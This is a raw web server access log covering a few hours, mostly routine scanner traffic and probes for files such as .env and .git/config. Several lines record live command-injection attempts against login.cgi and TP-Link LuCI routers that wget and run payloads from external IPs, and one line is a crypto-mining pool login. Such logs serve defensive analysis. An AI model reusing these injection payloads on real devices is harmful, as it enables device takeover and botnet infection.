185.16.38.111 - - [02/May/2024:03:53:17 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
43.133.146.123 - - [02/May/2024:03:54:41 +0200] "\x16\x03\x03\x01\xa6\x01" 501 321 "-" "-"
43.133.146.123 - - [02/May/2024:03:54:42 +0200] "\x16\x03\x03\x01\xa6\x01" 501 321 "-" "-"
43.133.146.123 - - [02/May/2024:03:54:43 +0200] "\x16\x03\x03\x01W\x01" 501 321 "-" "-"
43.133.146.123 - - [02/May/2024:03:54:44 +0200] "\x16\x03\x03\x01I\x01" 501 321 "-" "-"
43.133.146.123 - - [02/May/2024:03:54:44 +0200] "\x16\x03\x03\x01\x9a\x01" 501 321 "-" "-"
43.133.146.123 - - [02/May/2024:03:54:45 +0200] "\x16\x03\x02\x01\x9b\x01" 501 321 "-" "-"
43.133.146.123 - - [02/May/2024:03:54:46 +0200] "\x16\x03\x01\x01\xa8\x01" 501 321 "-" "-"
43.133.146.123 - - [02/May/2024:03:54:46 +0200] "\x16\x03\x01\x01\xa8\x01" 501 321 "-" "-"
43.133.146.123 - - [02/May/2024:03:54:47 +0200] "\x16\x03\x01\x01\x9e\x01" 501 321 "-" "-"
43.133.146.123 - - [02/May/2024:03:54:48 +0200] "\x16\x03\x01\x01\xb5\x01" 501 321 "-" "-"
43.133.146.123 - - [02/May/2024:03:54:48 +0200] "\x16\x03\x01" 501 318 "-" "-"
43.133.146.123 - - [02/May/2024:03:54:49 +0200] "\x16\x03\x01" 501 318 "-" "-"
43.133.146.123 - - [02/May/2024:03:54:50 +0200] "\x16\x03\x03\x01\xa6\x01" 501 321 "-" "-"
43.133.146.123 - - [02/May/2024:03:54:51 +0200] "\x16\x03\x03\x01\xa6\x01" 501 321 "-" "-"
43.133.146.123 - - [02/May/2024:03:54:51 +0200] "\x16\x03\x03\x01W\x01" 501 321 "-" "-"
43.133.146.123 - - [02/May/2024:03:54:52 +0200] "\x16\x03\x03\x01I\x01" 501 321 "-" "-"
43.133.146.123 - - [02/May/2024:03:54:53 +0200] "\x16\x03\x03\x01\x9a\x01" 501 321 "-" "-"
43.133.146.123 - - [02/May/2024:03:54:53 +0200] "\x16\x03\x02\x01\x9b\x01" 501 321 "-" "-"
43.133.146.123 - - [02/May/2024:03:54:54 +0200] "\x16\x03\x01\x01\xa8\x01" 501 321 "-" "-"
43.133.146.123 - - [02/May/2024:03:54:55 +0200] "\x16\x03\x01\x01\xa8\x01" 501 321 "-" "-"
43.133.146.123 - - [02/May/2024:03:54:56 +0200] "\x16\x03\x01\x01\x9e\x01" 501 321 "-" "-"
43.133.146.123 - - [02/May/2024:03:54:56 +0200] "\x16\x03\x01\x01\xb5\x01" 501 321 "-" "-"
43.133.146.123 - - [02/May/2024:03:54:57 +0200] "\x16\x03\x01" 501 318 "-" "-"
43.133.146.123 - - [02/May/2024:03:54:58 +0200] "\x16\x03\x01" 501 318 "-" "-"
87.236.176.197 - - [02/May/2024:03:56:37 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)"
43.133.146.123 - - [02/May/2024:03:56:41 +0200] "\x16\x03\x03\x01\xa6\x01" 501 321 "-" "-"
43.133.146.123 - - [02/May/2024:03:56:42 +0200] "\x16\x03\x03\x01\xa6\x01" 501 321 "-" "-"
43.133.146.123 - - [02/May/2024:03:56:43 +0200] "\x16\x03\x03\x01W\x01" 501 321 "-" "-"
43.133.146.123 - - [02/May/2024:03:56:43 +0200] "\x16\x03\x03\x01I\x01" 501 321 "-" "-"
43.133.146.123 - - [02/May/2024:03:56:44 +0200] "\x16\x03\x03\x01\x9a\x01" 501 321 "-" "-"
43.133.146.123 - - [02/May/2024:03:56:45 +0200] "\x16\x03\x02\x01\x9b\x01" 501 321 "-" "-"
43.133.146.123 - - [02/May/2024:03:56:46 +0200] "\x16\x03\x01\x01\xa8\x01" 501 321 "-" "-"
43.133.146.123 - - [02/May/2024:03:56:46 +0200] "\x16\x03\x01\x01\xa8\x01" 501 321 "-" "-"
43.133.146.123 - - [02/May/2024:03:56:47 +0200] "\x16\x03\x01\x01\x9e\x01" 501 321 "-" "-"
43.133.146.123 - - [02/May/2024:03:56:48 +0200] "\x16\x03\x01\x01\xb5\x01" 501 321 "-" "-"
43.133.146.123 - - [02/May/2024:03:56:48 +0200] "\x16\x03\x01" 501 318 "-" "-"
43.133.146.123 - - [02/May/2024:03:56:49 +0200] "\x16\x03\x01" 501 318 "-" "-"
43.133.146.123 - - [02/May/2024:03:56:50 +0200] "\x16\x03\x03\x01\xa6\x01" 501 321 "-" "-"
43.133.146.123 - - [02/May/2024:03:56:51 +0200] "\x16\x03\x03\x01\xa6\x01" 501 321 "-" "-"
43.133.146.123 - - [02/May/2024:03:56:51 +0200] "\x16\x03\x03\x01W\x01" 501 321 "-" "-"
43.133.146.123 - - [02/May/2024:03:56:52 +0200] "\x16\x03\x03\x01I\x01" 501 321 "-" "-"
43.133.146.123 - - [02/May/2024:03:56:53 +0200] "\x16\x03\x03\x01\x9a\x01" 501 321 "-" "-"
43.133.146.123 - - [02/May/2024:03:56:54 +0200] "\x16\x03\x02\x01\x9b\x01" 501 321 "-" "-"
43.133.146.123 - - [02/May/2024:03:56:54 +0200] "\x16\x03\x01\x01\xa8\x01" 501 321 "-" "-"
43.133.146.123 - - [02/May/2024:03:56:55 +0200] "\x16\x03\x01\x01\xa8\x01" 501 321 "-" "-"
43.133.146.123 - - [02/May/2024:03:56:56 +0200] "\x16\x03\x01\x01\x9e\x01" 501 321 "-" "-"
35.203.211.134 - - [02/May/2024:03:56:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
43.133.146.123 - - [02/May/2024:03:56:56 +0200] "\x16\x03\x01\x01\xb5\x01" 501 321 "-" "-"
43.133.146.123 - - [02/May/2024:03:56:57 +0200] "\x16\x03\x01" 501 318 "-" "-"
43.133.146.123 - - [02/May/2024:03:56:58 +0200] "\x16\x03\x01" 501 318 "-" "-"
185.224.128.43 - - [02/May/2024:04:00:04 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
159.65.185.134 - - [02/May/2024:04:01:02 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0"
164.52.0.94 - - [02/May/2024:04:01:10 +0200] "\x16\x03\x01\x02" 501 319 "-" "-"
164.52.0.94 - - [02/May/2024:04:01:11 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36"
164.52.0.94 - - [02/May/2024:04:01:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
164.52.0.94 - - [02/May/2024:04:01:18 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36"
164.52.0.94 - - [02/May/2024:04:01:21 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36"
146.19.24.28 - - [02/May/2024:04:03:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
209.141.40.117 - - [02/May/2024:04:03:32 +0200] "{\"id\":1,\"jsonrpc\":\"2.0\",\"method\":\"login\",\"params\":{\"login\":\"44cbWk3V34xXkgZh8V75ghGbbBYf2v25mWMNg4JV7GRghN3rBEnhrpDSCikpraL6mSYRF1SZFm69N4sg2QRtSYZL4EutwYg\",\"pass\":\"x\"}}" 501 584 "-" "-"
146.19.24.28 - - [02/May/2024:04:07:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
31.7.62.226 - - [02/May/2024:04:08:15 +0200] "GET /.git/config.old HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.80 Safari/537.36"
37.139.5.66 - - [02/May/2024:04:18:34 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://193.35.18.164/klausschwab.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "linus-torvalds-loves-you"
31.7.62.226 - - [02/May/2024:04:19:49 +0200] "GET /.git/config.old HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.154 Safari/537.36 OPR/20.0.1387.91"
31.7.62.226 - - [02/May/2024:04:20:01 +0200] "GET /.git/config.old HTTP/1.1" 404 320 "-" "Mozilla/5.0 (X11; CrOS i686 2268.111.0) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.57 Safari/536.11"
31.7.62.226 - - [02/May/2024:04:20:01 +0200] "GET /.git/config.old HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2"
185.16.38.111 - - [02/May/2024:04:21:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
35.203.211.252 - - [02/May/2024:04:21:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
159.65.185.134 - - [02/May/2024:04:22:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0"
159.65.185.134 - - [02/May/2024:04:22:48 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "http://212.91.246.82/" "Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0"
185.224.128.43 - - [02/May/2024:04:23:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.224.128.43 - - [02/May/2024:04:27:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.224.128.43 - - [02/May/2024:04:28:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.16.38.111 - - [02/May/2024:04:30:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
51.158.205.47 - - [02/May/2024:04:34:02 +0200] "GET / HTTP/1.0" 200 1229 "-" "masscan/1.3 (https://github.com/robertdavidgraham/masscan)"
185.180.143.79 - - [02/May/2024:04:38:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
185.180.143.79 - - [02/May/2024:04:38:57 +0200] "GET /cf_scripts/scripts/ajax/ckeditor/ckeditor.js HTTP/1.1" 404 349 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
84.54.51.41 - - [02/May/2024:04:45:07 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+r%3B+wget+http%3A%2F%2F94.156.79.193%2Fr%3B+chmod+777+r%3B+.%2Fr+tplink%3B+rm+-rf+r%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
162.216.150.247 - - [02/May/2024:04:46:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
87.246.7.62 - - [02/May/2024:04:47:39 +0200] "GET /cgi/conf.bin HTTP/1.1" 404 317 "http://212.91.246.83:80/mainFrame.htm" "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.97 Safari/537.11"
185.16.38.111 - - [02/May/2024:04:52:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
44.220.188.80 - - [02/May/2024:04:55:07 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.2;en-US) AppleWebKit/537.32.36 (KHTML, live Gecko) Chrome/52.0.3070.87 Safari/537.32"
152.231.63.12 - - [02/May/2024:04:55:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
51.159.99.244 - - [02/May/2024:04:59:49 +0200] "HEAD / HTTP/1.1" 200 - "-" "curl/7.81.0"
51.159.99.244 - - [02/May/2024:04:59:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.3"
51.159.99.244 - - [02/May/2024:04:59:51 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.3"
51.159.99.244 - - [02/May/2024:04:59:51 +0200] "GET /ads.txt HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.3"
51.159.99.244 - - [02/May/2024:04:59:51 +0200] "GET /app-ads.txt HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.3"
51.159.99.244 - - [02/May/2024:04:59:51 +0200] "GET /sellers.json HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.3"
198.235.24.221 - - [02/May/2024:05:06:27 +0200] "\x16\x03\x01" 501 318 "-" "-"
198.235.24.221 - - [02/May/2024:05:06:27 +0200] "\x16\x03\x01" 501 318 "-" "-"
185.16.38.111 - - [02/May/2024:05:09:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.138.61 - - [02/May/2024:05:12:36 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.138.61 - - [02/May/2024:05:12:46 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.61 - - [02/May/2024:05:12:48 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
167.94.138.61 - - [02/May/2024:05:12:50 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
185.62.58.49 - - [02/May/2024:05:16:15 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
185.62.58.49 - - [02/May/2024:05:16:17 +0200] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
185.16.38.111 - - [02/May/2024:05:20:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.138.33 - - [02/May/2024:05:24:38 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.138.33 - - [02/May/2024:05:24:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.33 - - [02/May/2024:05:24:46 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
167.94.138.33 - - [02/May/2024:05:24:47 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
195.1.144.109 - - [02/May/2024:05:32:58 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id>`cd+/tmp;+rm+-rf+shk;+wget+http://103.14.226.142/shk;+chmod+777+shk;+./shk+tplink;+rm+-rf+shk`) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
195.1.144.109 - - [02/May/2024:05:33:29 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id>`cd+/tmp;+rm+-rf+shk;+wget+http://103.14.226.142/shk;+chmod+777+shk;+./shk+tplink;+rm+-rf+shk`) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
198.235.24.199 - - [02/May/2024:05:40:30 +0200] "\x16\x03\x01" 501 318 "-" "-"
198.235.24.199 - - [02/May/2024:05:40:30 +0200] "\x16\x03\x01" 501 318 "-" "-"
185.16.38.111 - - [02/May/2024:05:45:07 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
87.246.7.62 - - [02/May/2024:05:46:20 +0200] "GET /cgi/conf.bin HTTP/1.1" 404 317 "http://212.91.246.85:80/mainFrame.htm" "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.97 Safari/537.11"
64.62.197.60 - - [02/May/2024:05:48:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.0.0"
216.218.206.66 - - [02/May/2024:05:48:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.85 Safari/537.36 OPR/80.0.4170.72"
64.62.197.47 - - [02/May/2024:05:50:13 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"
64.62.197.52 - - [02/May/2024:05:50:44 +0200] "GET /geoserver/web/ HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.0.0"
216.218.206.66 - - [02/May/2024:05:51:38 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15"
216.218.206.66 - - [02/May/2024:05:52:34 +0200] "GET /geoserver/web/ HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.85 Safari/537.36 OPR/80.0.4170.72"
85.187.237.98 - - [02/May/2024:05:53:09 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
185.142.236.41 - - [02/May/2024:05:54:46 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
185.142.236.41 - - [02/May/2024:05:54:47 +0200] "GET /robots.txt HTTP/1.1" 404 315 "-" "-"
185.142.236.41 - - [02/May/2024:05:54:47 +0200] "GET /sitemap.xml HTTP/1.1" 404 316 "-" "-"
185.142.236.41 - - [02/May/2024:05:54:48 +0200] "GET /.well-known/security.txt HTTP/1.1" 404 329 "-" "-"
185.142.236.41 - - [02/May/2024:05:54:50 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36"
185.16.38.111 - - [02/May/2024:05:57:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.16.38.111 - - [02/May/2024:05:58:10 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
81.91.173.172 - - [02/May/2024:05:58:38 +0200] "GET / HTTP/1.1" 200 1229 "-" "DENIC-Crawler/42"
45.88.90.87 - - [02/May/2024:06:01:04 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
45.88.90.87 - - [02/May/2024:06:01:04 +0200] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
45.88.90.87 - - [02/May/2024:06:02:07 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
45.88.90.87 - - [02/May/2024:06:02:07 +0200] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
185.191.126.213 - - [02/May/2024:06:03:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
195.1.144.109 - - [02/May/2024:06:05:49 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id>`cd+/tmp;+rm+-rf+shk;+wget+http://103.14.226.142/shk;+chmod+777+shk;+./shk+tplink;+rm+-rf+shk`) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
185.16.38.111 - - [02/May/2024:06:05:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
87.121.69.52 - - [02/May/2024:06:07:17 +0200] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
195.1.144.109 - - [02/May/2024:06:10:03 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id>`cd+/tmp;+rm+-rf+shk;+wget+http://103.14.226.142/shk;+chmod+777+shk;+./shk+tplink;+rm+-rf+shk`) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
185.191.126.213 - - [02/May/2024:06:13:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
87.121.69.52 - - [02/May/2024:06:14:29 +0200] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
185.191.126.213 - - [02/May/2024:06:17:27 +0200] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
87.121.69.52 - - [02/May/2024:06:18:38 +0200] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
87.121.69.52 - - [02/May/2024:06:20:40 +0200] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
87.236.176.120 - - [02/May/2024:06:22:34 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)"
185.191.126.213 - - [02/May/2024:06:25:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
185.191.126.213 - - [02/May/2024:06:26:11 +0200] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
87.121.69.52 - - [02/May/2024:06:26:43 +0200] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
94.156.79.228 - - [02/May/2024:06:27:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36"
87.246.7.62 - - [02/May/2024:06:28:46 +0200] "GET /cgi/conf.bin HTTP/1.1" 404 317 "http://212.91.246.89:80/mainFrame.htm" "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.97 Safari/537.11"
198.235.24.127 - - [02/May/2024:06:29:59 +0200] "\x16\x03\x01" 501 318 "-" "-"
198.235.24.127 - - [02/May/2024:06:29:59 +0200] "\x16\x03\x01" 501 318 "-" "-"
71.6.134.233 - - [02/May/2024:06:31:22 +0200] "\x16\x03\x01" 501 318 "-" "-"
71.6.134.233 - - [02/May/2024:06:31:45 +0200] "\x16\x03\x01" 501 318 "-" "-"
87.121.69.52 - - [02/May/2024:06:34:10 +0200] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
198.235.24.164 - - [02/May/2024:06:38:16 +0200] "\x16\x03\x01" 501 318 "-" "-"
198.235.24.164 - - [02/May/2024:06:38:16 +0200] "\x16\x03\x01" 501 318 "-" "-"
87.121.69.52 - - [02/May/2024:06:39:16 +0200] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
87.121.69.52 - - [02/May/2024:06:39:21 +0200] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
87.121.69.52 - - [02/May/2024:06:41:43 +0200] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
71.6.134.233 - - [02/May/2024:06:48:16 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36"
71.6.134.233 - - [02/May/2024:06:48:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36"
71.6.134.233 - - [02/May/2024:06:50:07 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36"
71.6.134.233 - - [02/May/2024:06:50:38 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36"
185.16.38.111 - - [02/May/2024:06:52:04 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.191.126.213 - - [02/May/2024:06:54:37 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
27.54.121.126 - - [02/May/2024:06:54:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
206.168.34.35 - - [02/May/2024:06:55:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
206.168.34.35 - - [02/May/2024:06:55:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
206.168.34.35 - - [02/May/2024:06:55:45 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
206.168.34.35 - - [02/May/2024:06:55:45 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
185.191.126.213 - - [02/May/2024:06:56:07 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.191.126.213 - - [02/May/2024:06:57:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [02/May/2024:07:00:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
